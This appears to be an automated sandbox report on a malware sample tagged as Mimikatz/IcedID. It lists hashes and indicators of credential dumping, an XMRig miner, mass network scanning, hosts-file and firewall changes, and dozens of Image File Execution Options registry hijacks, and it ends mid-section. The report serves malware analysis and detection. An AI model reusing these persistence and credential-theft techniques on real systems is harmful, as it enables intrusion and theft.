Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2024 05:31
Behavioral task
behavioral1
Sample
2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe
-
Size
6.8MB
-
MD5
90b5dff2673e5e3da4c79523b716202a
-
SHA1
61d571d4a8fe2d0dcec5bf59480568cfe9400afe
-
SHA256
3e5f958c4ec5626b5d6dfaa40597c9e335682f00a1c82631e6ac9dfeb2ff81b7
-
SHA512
7568569c09511e5dd77a5e426ca766719c8bdc9e35902812816838c4abb2b3ad4a68fe3fbf3c4d0fb101b17e9ceeae1e8bac02fe22be6643d9f98e6e92c47f17
-
SSDEEP
196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
nsgwibn.exedescription pid process target process PID 2108 created 1396 2108 nsgwibn.exe spoolsv.exe -
Xmrig family
-
Contacts a large (30357) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/5096-175-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-179-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-200-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-212-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-221-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-232-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-245-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-253-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-264-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-373-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-374-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig behavioral2/memory/5096-377-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
Processes:
resource yara_rule behavioral2/memory/436-3-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz C:\Windows\guiyywyg\nsgwibn.exe mimikatz behavioral2/memory/680-135-0x00007FF7B2C00000-0x00007FF7B2CEE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
nsgwibn.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts nsgwibn.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts nsgwibn.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
nsgwibn.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" nsgwibn.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 2888 netsh.exe 3232 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
nsgwibn.exensgwibn.exewpcap.exekzurgcimy.exevfshost.exeyumgbbwyg.exexohudmc.exeasysoo.exeierigg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exensgwibn.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exeyumgbbwyg.exevvwuinghb.exensgwibn.exepid process 3732 nsgwibn.exe 2108 nsgwibn.exe 1040 wpcap.exe 4252 kzurgcimy.exe 680 vfshost.exe 4856 yumgbbwyg.exe 4068 xohudmc.exe 3064 asysoo.exe 5096 ierigg.exe 4844 yumgbbwyg.exe 2668 yumgbbwyg.exe 4552 yumgbbwyg.exe 380 yumgbbwyg.exe 2528 yumgbbwyg.exe 724 yumgbbwyg.exe 3700 yumgbbwyg.exe 3444 yumgbbwyg.exe 3412 nsgwibn.exe 2032 yumgbbwyg.exe 3848 yumgbbwyg.exe 2220 yumgbbwyg.exe 5108 yumgbbwyg.exe 4984 yumgbbwyg.exe 4128 yumgbbwyg.exe 1324 yumgbbwyg.exe 3444 yumgbbwyg.exe 3420 yumgbbwyg.exe 4836 vvwuinghb.exe 3356 nsgwibn.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exekzurgcimy.exepid process 1040 wpcap.exe 1040 wpcap.exe 1040 wpcap.exe 1040 wpcap.exe 1040 wpcap.exe 1040 wpcap.exe 1040 wpcap.exe 1040 wpcap.exe 1040 wpcap.exe 4252 kzurgcimy.exe 4252 kzurgcimy.exe 4252 kzurgcimy.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 77 ifconfig.me 78 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
nsgwibn.exewpcap.exexohudmc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 nsgwibn.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF nsgwibn.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE nsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF nsgwibn.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\asysoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\asysoo.exe xohudmc.exe -
Processes:
resource yara_rule C:\Windows\iguwtuflb\Corporate\vfshost.exe upx behavioral2/memory/680-132-0x00007FF7B2C00000-0x00007FF7B2CEE000-memory.dmp upx behavioral2/memory/680-135-0x00007FF7B2C00000-0x00007FF7B2CEE000-memory.dmp upx C:\Windows\Temp\iguwtuflb\yumgbbwyg.exe upx behavioral2/memory/4856-139-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/4856-157-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx C:\Windows\Temp\ybymbrggy\ierigg.exe upx behavioral2/memory/5096-162-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/4844-168-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/2668-172-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5096-175-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/4552-177-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5096-179-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/380-182-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/2528-186-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/724-190-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/3700-194-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/3444-198-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5096-200-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/2032-206-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/3848-210-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5096-212-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/2220-215-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5108-219-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5096-221-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/4984-224-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/4128-227-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/1324-229-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/3444-231-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5096-232-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/3420-234-0x00007FF748BB0000-0x00007FF748C0B000-memory.dmp upx behavioral2/memory/5096-245-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/5096-253-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/5096-264-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/5096-373-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/5096-374-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx behavioral2/memory/5096-377-0x00007FF6F3200000-0x00007FF6F3320000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
nsgwibn.execmd.exe2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exevvwuinghb.exedescription ioc process File created C:\Windows\iguwtuflb\UnattendGC\specials\xdvl-0.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\zlib1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\spoolsrv.xml nsgwibn.exe File created C:\Windows\guiyywyg\svschost.xml nsgwibn.exe File created C:\Windows\ime\nsgwibn.exe nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\tibe-2.dll nsgwibn.exe File created C:\Windows\guiyywyg\vimpcsvc.xml nsgwibn.exe File opened for modification C:\Windows\guiyywyg\vimpcsvc.xml nsgwibn.exe File opened for modification C:\Windows\iguwtuflb\Corporate\log.txt cmd.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\svschost.xml nsgwibn.exe File created C:\Windows\iguwtuflb\Corporate\mimidrv.sys nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\crli-0.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\ucl.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\svschost.exe nsgwibn.exe File opened for modification C:\Windows\guiyywyg\svschost.xml nsgwibn.exe File opened for modification C:\Windows\guiyywyg\nsgwibn.exe 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\libeay32.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\Shellcode.ini nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\AppCapture64.dll nsgwibn.exe File opened for modification C:\Windows\iguwtuflb\umnwwtqyn\Packet.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\trch-1.dll nsgwibn.exe File created C:\Windows\guiyywyg\schoedcl.xml nsgwibn.exe File created C:\Windows\iguwtuflb\upbdrjv\swrpwe.exe nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\kzurgcimy.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\schoedcl.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\docmicfg.xml nsgwibn.exe File created C:\Windows\guiyywyg\docmicfg.xml nsgwibn.exe File created C:\Windows\iguwtuflb\Corporate\mimilib.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\coli-0.dll nsgwibn.exe File opened for modification C:\Windows\guiyywyg\spoolsrv.xml nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\wpcap.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\exma-1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\spoolsrv.exe nsgwibn.exe File created C:\Windows\guiyywyg\spoolsrv.xml nsgwibn.exe File opened for modification C:\Windows\iguwtuflb\umnwwtqyn\Result.txt vvwuinghb.exe File created C:\Windows\iguwtuflb\umnwwtqyn\Packet.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\cnli-1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\docmicfg.exe nsgwibn.exe File created C:\Windows\iguwtuflb\Corporate\vfshost.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\libxml2.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\docmicfg.xml nsgwibn.exe File opened for modification C:\Windows\guiyywyg\docmicfg.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\AppCapture32.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\spoolsrv.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\ssleay32.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\tucl-1.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\vimpcsvc.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\schoedcl.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\vimpcsvc.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\schoedcl.xml nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\vvwuinghb.exe nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\posh-0.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\specials\trfo-2.dll nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\svschost.xml nsgwibn.exe File created C:\Windows\iguwtuflb\UnattendGC\vimpcsvc.xml nsgwibn.exe File opened for modification C:\Windows\guiyywyg\schoedcl.xml nsgwibn.exe File created C:\Windows\iguwtuflb\umnwwtqyn\scan.bat nsgwibn.exe File created C:\Windows\guiyywyg\nsgwibn.exe 2024-11-02_90b5dff2673e5e3da4c79523b716202a_hacktools_icedid_mimikatz.exe File created C:\Windows\iguwtuflb\umnwwtqyn\ip.txt nsgwibn.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 2600 sc.exe 380 sc.exe 3792 sc.exe 2592 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
